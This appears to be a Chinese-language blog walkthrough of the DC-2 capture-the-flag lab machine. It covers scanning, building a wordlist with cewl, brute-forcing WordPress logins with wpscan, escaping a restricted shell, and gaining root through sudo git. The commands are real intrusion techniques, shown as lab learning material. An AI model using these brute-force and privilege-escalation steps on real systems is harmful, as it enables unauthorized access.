萌新DC系列靶机渗透详解之DC-2

DC-1 结束之后开始 DC-2 的内容

1. 明确目标

目标肯定还是不变的嘛，还是找齐里面所有的 flag

根据每个 flag 的提示找到下一个 flag

2. 信息收集

靶机是在同一个网段下使用的

还是 arp-scan 扫描即可

└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:1a:d5, IPv4: 192.168.0.111
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1     f4:6a:92:10:12:f2       SHENZHEN FAST TECHNOLOGIES CO.,LTD
192.168.0.104   58:a0:23:79:16:11       Intel Corporate
192.168.0.100   48:2c:a0:e5:36:51       Xiaomi Communications Co Ltd
192.168.0.103   8c:c8:4b:60:79:f1       CHONGQING FUGUI ELECTRONICS CO.,LTD.
192.168.0.131   8c:c8:4b:60:79:f1       CHONGQING FUGUI ELECTRONICS CO.,LTD.5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.998 seconds (128.13 hosts/sec). 5 responded

环境里机器较少，看得出来是靶机地址是 192.168.1.131

3. 漏洞探测

使用 nmap -A -p- 命令收集信息(比 DC-1 多了一个扫描端口的命令 -p- )

└─# nmap -A -p- 192.168.0.131
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 14:41 CST
Nmap scan report for localhost (192.168.0.131)
Host is up (0.0065s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)    #ssh端口改为了7744
| ssh-hostkey:
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 8C:C8:4B:60:79:F1 (Chongqing Fugui Electronics)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT     ADDRESS
1   6.52 ms localhost (192.168.0.131)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.07 seconds

使用 nmap 自带的漏洞扫描脚本扫描靶机

nmap --script=vuln 192.168.0.131
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 15:46 CST
Nmap scan report for dc-2 (192.168.0.131)
Host is up (0.0056s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=dc-2
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://dc-2:80/index.php/what-we-do/%5c%22
|     Form id: search-form-60f6f0078fbec
|     Form action: http://dc-2/
|
|     Path: http://dc-2:80/index.php/flag/%5c%22
|     Form id: search-form-60f6f0088cc0d
|_    Form action: http://dc-2/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:                                #nmap 的枚举
|   /wp-login.php: Possible admin folder    #这个应该是登录页面
|   /readme.html: Wordpress version: 2
|   /: WordPress version: 4.7.10
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
| http-sql-injection:
|   Possible sqli for queries:
|     http://dc-2:80/wp-includes/js/jquery/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://dc-2:80/wp-includes/js/jquery/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://dc-2:80/wp-includes/js/jquery/?C=M%3bO%3dA%27%20OR%20sqlspider
|_    http://dc-2:80/wp-includes/js/jquery/?C=N%3bO%3dD%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: admin #名字也被枚举出来了
| Username found: tom
| Username found: jerry
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
MAC Address: 8C:C8:4B:60:79:F1 (Chongqing Fugui Electronics)Nmap done: 1 IP address (1 host up) scanned in 33.62 seconds

找不到什么有用的信息了，登录网站看看

呃，进不去，看来是屏蔽了使用ip登录网站

看样子改一下 host 文件就行

vim /etc/hosts
127.0.0.1       localhost
127.0.1.1
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.0.131   dc-2  #这是添加的内容

找到了 flag1：

Flag 1:Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
'你通常的词表可能不起作用，所以相反，也许你只需要成为cewl'
More passwords is always better, but sometimes you just can’t win them all.
'密码越多越好，但有时你就是赢不了'
Log in as one to see the next flag.
'作为一个登录以查看下一个 flag'
If you can’t find it, log in as another.
'如果找不到，请以另一个身份登录'
#cewl。密码并不是越多越好。登录查看下一个 flag。不止一个账户

可以看出，下一个 flag 是必须登录才能拿到的，而 cewl 是 kali 的密码攻击工具之一

那么使用 cewl 搞出网站密码

└─# cewl http://dc-2 -w dc2pwd.txt
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)                                    └─# ls
公共  模板  视频  图片  文档  下载  音乐  桌面  dc2pwd.txt

再把被nmap枚举出的用户名写到文件中

└─# vim dc2usr.txt
└─# cat dc2usr.txt
admin
tom
jerry

4. 漏洞利用

使用 wpsacn 爆破密码

└─# wpscan --url http://dc-2 -U dc2usr -P dc2pwd
_________________________________________________________________          _______   _____\ \        / /  __ \ / ____|\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \\  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.18Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: http://dc-2/ [192.168.0.131]
[+] Started: Wed Jul 21 21:34:22 2021Interesting Finding(s):
'------------------------略-----------------------------'[!] Valid Combinations Found:| Username: jerry, Password: adipiscing| Username: tom, Password: parturient             #找到密码了[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[+] Finished: Wed Jul 21 21:35:37 2021
[+] Requests Done: 1055
[+] Cached Requests: 5
[+] Data Sent: 479.891 KB
[+] Data Received: 893.479 KB
[+] Memory used: 240.852 MB
[+] Elapsed time: 00:01:15

现在我们知道了用户的账户密码，nmap 扫出了后台登录网站，登录一下试试。

/wp-login.php: Possible admin folde #nmap 枚举出的登录页面| Username: jerry, Password: adipiscing #账号密码| Username: tom, Password: parturient

在 Page 一栏找到了 flag2

Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
#如果你不能用 WordPress 走捷径的话，这里还有另一条路
Hope you found another entry point.
#希望你能找到另一个切入点

在开始的扫描中，发现 ssh 是打开的，既然我们有用户密码，不妨试试 ssh 连接

ssh 连接 jerry 貌似失败了

└─# ssh jerry@192.168.0.131 -p 7744
The authenticity of host '[192.168.0.131]:7744 ([192.168.0.131]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.0.131]:7744' (ECDSA) to the list of known hosts.
jerry@192.168.0.131's password: adipiscing
Permission denied, please try again.
jerry@192.168.0.131's password: adipiscing
Permission denied, please try again.
jerry@192.168.0.131's password: adipiscing
jerry@192.168.0.131: Permission denied (publickey,password).

连接 tom 成功

└─# ssh tom@192.168.0.131 -p 7744
tom@192.168.0.131's password: parturient  The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls #找到了 flag3 了
flag3.txt  usr
tom@DC-2:~$ cat #貌似不少命令被禁用了
-rbash: cat: command not found
tom@DC-2:~$ find
-rbash: find: command not found

瞅一眼

#flag5:
poor old Tom is always running after Jerry.
#可怜的老汤姆总是在追杰瑞
Perhaps he should su for all the stress he causes.
#也许他应该为自己造成的压力负责
#貌似是 su for 就是切换用户的意思嘛，试试看
tom@DC-2:~$ su
-rbash: su: command not found
#貌似是没用

解决这个 -rbash ，找一下端被限制后如何解除的博客(←这篇讲的挺好的)

进入了自定义的 bash

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ cd ..
#仍然很多指令用不了，但是可以用 cd 了
$ ls
jerry  tom
#看见了jerry的文件夹
$ cd jerry
$ ls
flag4.txt
$ vi flag4.txt
#找到了 flag4

flag4：

Good to see that you've made it this far - but you're not home yet.
很高兴看到你走了这么远-但你还没回家。
You still need to get the final flag (the only flag that really counts!!!).
你仍然需要得到最终的标志（唯一真正重要的标志！！！） # 就是root嘛，懂的
No hints here - you're on your own now.  :-)
这里没有提示-你现在只能靠自己了。：-）
Go on - git outta here!!!!
去吧，离这里远点 #是用 git 提权吗

现在使用的自定义的bash 还是有很多命令不能使用

$ /bin/bash
#更改环境变量
tom@DC-2:~$ export PATH=$PATH:/bin/
#验证是否成功
tom@DC-2:~$ su

**flag4是属于逃课拿到的，切换到 jerry **

tom@DC-2:~$ su jerry
Password: adipiscing
jerry@DC-2:/home/tom$ cd
jerry@DC-2:~$
#成功切换至 jerry

既然 flag 里提示我们使用git 提权，那就试试好了

jerry@DC-2:~$ sudo git -p help #使用 root 权限打开切换到的终端就是 root 终端
usage: git [--version] [--help] [-C <path>] [-c name=value][--exec-path[=<path>]] [--html-path] [--man-path] [--info-path][-p|--paginate|--no-pager] [--no-replace-objects] [--bare][--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]<command> [<args>]The most commonly used git commands are:add        Add file contents to the indexbisect     Find by binary search the change that introduced a bugbranch     List, create, or delete branchescheckout   Checkout a branch or paths to the working treeclone      Clone a repository into a new directorycommit     Record changes to the repositorydiff       Show changes between commits, commit and working tree, etcfetch      Download objects and refs from another repositorygrep       Print lines matching a patterninit       Create an empty Git repository or reinitialize an existing onelog        Show commit logsmerge      Join two or more development histories togethermv         Move or rename a file, a directory, or a symlinkpull       Fetch from and integrate with another repository or a local branchpush       Update remote refs along with associated objectsrebase     Forward-port local commits to the updated upstream headreset      Reset current HEAD to the specified staterm         Remove files from the working tree and from the indexshow       Show various types of objectsstatus     Show the working tree statustag        Create, list, delete or verify a tag object signed with GPG!/bin/bash

成功拿到root权限，查看最后的 flag

root@DC-2:/home/jerry# whoami
root
root@DC-2:/home/jerry# cd
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt __    __     _ _       _                    _
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /\  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   Congratulatons!!!A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.If you enjoyed this CTF, send me a tweet via @DCAU7.

5. 总结

修改 host 文件绕过防止恶意解析

vim /etc/hosts
使用了 cewl 编写网站特殊字典

cewl [url] -u [name]
使用 wpscan 爆破网站用户登录密码

wpscan --url [url] -U [username.file] -P [userpwd.flie]
使用自定义的 bash 并添加变量绕过 -rbash 的限制

BASH_CMDS[a]=/bin/bash

export PATH=$PATH:/bin/
使用 git 提权

sudo -p help

!/bin/bash

(本人是渗透萌新，后面绝大多数的内容都是跟着大佬们的博客和自己的思考进行的)

如果有问题欢迎评论区，私信讨论，共同进步

DC-2渗透靶机详解相关推荐

DC-4渗透靶机详解
萌新DC系列靶机渗透详解之 DC-4 "DC-3好难呜呜,先打DC-4" 1. 明确目标获得靶机 root 权限,找到root账户下的 flag 2. 信息收集使用 arp-s ...
Nmap渗透测试详解（一）
Nmap渗透测试详解(一) 如今,Nmap享有"扫描之王"盛誉. Nmap诞生于1996年.在这个信息爆炸的互联网时代,Nmap依然保持着充沛的活力以及旺盛的生命力.原因如下: 知 ...
《Kali Linux高级渗透测试原书第2版》网络渗透测试技术书无线网络渗透测试详解黑客攻击与防范实战从入门到精通书
内容简介: KaliLinux面向专业的渗透测试和审计,集成了大量挑选的检测工具.本书在KaliLinux平台上从一个攻击者的角度来审视网络框架,详细介绍了攻击者"杀链"采取的具体 ...
【靶机详解】DC-1
文章目录环境搭建环境信息渗透思路 1信息收集 2漏洞发现 3漏洞利用知识点汇总参考资料环境搭建下载靶机(DC-1 靶机下载) 解压后,使用 VMware 打开,并将攻击机和靶机的网卡,设 ...
[系统安全] 四十五.APT系列(10)Metasploit后渗透技术信息收集、权限提权和功能模块详解
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
张小白的渗透之路（二）——SQL注入漏洞原理详解
SQL注入漏洞简介乱七八糟的就不多说了,自己百度去 SQL注入原理想要更好的学习SQL注入,那么我们就必须要深入的了解每种数据库的SQL语法及特性.下面通过一个经典的万能密码的例子带大家来拨开一下 ...
后渗透测试神器Empire的详解
一.前言 Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学.安全通信和灵活的架构之上.Empire实现了无需powershell.exe就可运 ...
pstools套件在渗透中的应用详解
其实接触pstool很久了,但是据我观察用pstools套件在渗透中的应用的介绍却比较少. 当然玩bt5的同学可能常常用到,小菜就写一篇关于pstools套件在渗透中的应用进行详解. pstool的介 ...
Kali linux无线网络渗透详解笔记
Kali linux无线网络渗透详解笔记第一章:搭建渗透环境测试环境第二章:WiFi网络的构成第三章:监听WiFi网络第四章:捕获数据包第五章: 分析数据包第六章:获取信息第七章:WPS ...

DC-2渗透靶机详解